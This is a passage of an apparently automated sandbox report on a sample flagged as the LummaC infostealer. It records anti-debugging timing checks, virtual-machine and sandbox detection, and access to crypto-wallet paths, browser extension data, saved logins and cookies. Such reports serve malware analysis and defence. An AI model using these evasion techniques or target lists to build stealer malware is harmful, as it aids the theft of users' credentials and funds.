                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0CCF second address: 51A0D38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007F83146B40D9h 0x00000012 pop eax 0x00000013 pushad 0x00000014 mov cx, 91A3h 0x00000018 jmp 00007F83146B40D8h 0x0000001d popad 0x0000001e call 00007F8384F68F1Eh 0x00000023 push 75A52B70h 0x00000028 push dword ptr fs:[00000000h] 0x0000002f mov eax, dword ptr [esp+10h] 0x00000033 mov dword ptr [esp+10h], ebp 0x00000037 lea ebp, dword ptr [esp+10h] 0x0000003b sub esp, eax 0x0000003d push ebx 0x0000003e push esi 0x0000003f push edi 0x00000040 mov eax, dword ptr [75AB4538h] 0x00000045 xor dword ptr [ebp-04h], eax 0x00000048 xor eax, ebp 0x0000004a push eax 0x0000004b mov dword ptr [ebp-18h], esp 0x0000004e push dword ptr [ebp-08h] 0x00000051 mov eax, dword ptr [ebp-04h] 0x00000054 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000005b mov dword ptr [ebp-08h], eax 0x0000005e lea eax, dword ptr [ebp-10h] 0x00000061 mov dword ptr fs:[00000000h], eax 0x00000067 ret 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007F83146B40D7h 0x0000006f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0D38 second address: 51A0D63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA9199h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8314EA918Ah 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0DCB second address: 51A0DE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0DE6 second address: 51A0E14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA9199h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8314EA918Dh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0E14 second address: 51A0E1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0E1A second address: 51A0E3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F838574CCE9h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8314EA9191h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0E3D second address: 51A0E43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0E43 second address: 51A0E49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0C06 second address: 51B0C6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F83146B40D4h 0x00000011 or cx, 0A48h 0x00000016 jmp 00007F83146B40CBh 0x0000001b popfd 0x0000001c mov esi, 32310DBFh 0x00000021 popad 0x00000022 push eax 0x00000023 pushad 0x00000024 push edi 0x00000025 pushfd 0x00000026 jmp 00007F83146B40CEh 0x0000002b xor si, 4CA8h 0x00000030 jmp 00007F83146B40CBh 0x00000035 popfd 0x00000036 pop ecx 0x00000037 push eax 0x00000038 push edx 0x00000039 push edx 0x0000003a pop eax 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0C6B second address: 51B0C89 instructions: 0x00000000 rdtsc 0x00000002 mov di, A616h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F8314EA918Dh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0C89 second address: 51B0C90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dh, 55h 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0C90 second address: 51B0CBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 call 00007F8314EA918Dh 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8314EA9193h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0CBD second address: 51B0CC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0CC3 second address: 51B0CC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0CC7 second address: 51B0CCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0CCB second address: 51B0D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b jmp 00007F8314EA9197h 0x00000010 mov esi, dword ptr [ebp+0Ch] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F8314EA9195h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0D07 second address: 51B0D0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0D0C second address: 51B0D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bl, 1Bh 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8314EA918Eh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0D29 second address: 51B0D2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0D2D second address: 51B0D33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0D33 second address: 51B0DB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F8384F51738h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F83146B40CEh 0x00000016 xor ax, 3E18h 0x0000001b jmp 00007F83146B40CBh 0x00000020 popfd 0x00000021 mov si, A1CFh 0x00000025 popad 0x00000026 cmp dword ptr [75AB459Ch], 05h 0x0000002d pushad 0x0000002e mov si, FBC7h 0x00000032 mov ax, 8D63h 0x00000036 popad 0x00000037 je 00007F8384F697DBh 0x0000003d jmp 00007F83146B40D6h 0x00000042 xchg eax, esi 0x00000043 pushad 0x00000044 mov bh, ch 0x00000046 mov bh, 18h 0x00000048 popad 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F83146B40D0h 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0EAC second address: 51B0EB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0EB2 second address: 51B0EB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0EB6 second address: 51B0EBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\random(2).exeSpecial instruction interceptor: First address: 63FC8D instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\random(2).exeSpecial instruction interceptor: First address: 63FBD3 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\random(2).exeSpecial instruction interceptor: First address: 63D396 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\random(2).exeSpecial instruction interceptor: First address: 80689A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\random(2).exeSpecial instruction interceptor: First address: 862B81 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\random(2).exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\random(2).exe TID: 4480Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\random(2).exe TID: 2552Thread sleep time: -30015s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: random(2).exe, 00000000.00000002.1594491101.00000000007BD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: random(2).exe, random(2).exe, 00000000.00000003.1582541164.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1547185152.00000000011C9000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1593600134.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000002.1595595282.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1592957728.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1310008327.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1557681819.00000000011CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: random(2).exe, 00000000.00000003.1582541164.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1557681819.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1592957728.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1546978449.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000002.1595466704.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1547540496.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1309813518.00000000011A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
                Source: random(2).exe, 00000000.00000002.1595283299.0000000001177000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                Source: random(2).exe, 00000000.00000002.1594491101.00000000007BD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\random(2).exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\random(2).exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\random(2).exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\random(2).exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\random(2).exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\random(2).exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\random(2).exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\random(2).exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\random(2).exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\random(2).exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\random(2).exeFile opened: NTICE
                Source: C:\Users\user\Desktop\random(2).exeFile opened: SICE
                Source: C:\Users\user\Desktop\random(2).exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\random(2).exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeProcess queried: DebugPortJump to behavior
                Source: random(2).exe, 00000000.00000002.1594491101.00000000007BD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: EProgram Manager
                Source: C:\Users\user\Desktop\random(2).exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: random(2).exe, 00000000.00000003.1582541164.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1593600134.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000002.1595595282.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1592957728.00000000011CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iles%\Windows Defender\MsMpeng.exe
                Source: random(2).exe, random(2).exe, 00000000.00000003.1582541164.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1582541164.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1567432553.0000000001232000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1558835674.0000000001232000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1593600134.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000002.1595595282.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1592957728.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1593831702.0000000001232000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1582475958.0000000001232000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000002.1595725997.0000000001232000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\random(2).exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: random(2).exe PID: 6644, type: MEMORYSTR
                Source: Yara matchFile source: 00000000.00000002.1594325672.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1293558753.0000000005020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: random(2).exeString found in binary or memory: Wallets/Electrum-LTC
                Source: random(2).exeString found in binary or memory: %appdata%\ElectronCash\wallets
                Source: random(2).exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: random(2).exeString found in binary or memory: window-state.json
                Source: random(2).exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: random(2).exeString found in binary or memory: ExodusWeb3
                Source: random(2).exeString found in binary or memory: Wallets/Ethereum
                Source: random(2).exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: random(2).exeString found in binary or memory: keystore
                Source: random(2).exeString found in binary or memory: C:\Users\user\AppData\Roaming\Ledger Live
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
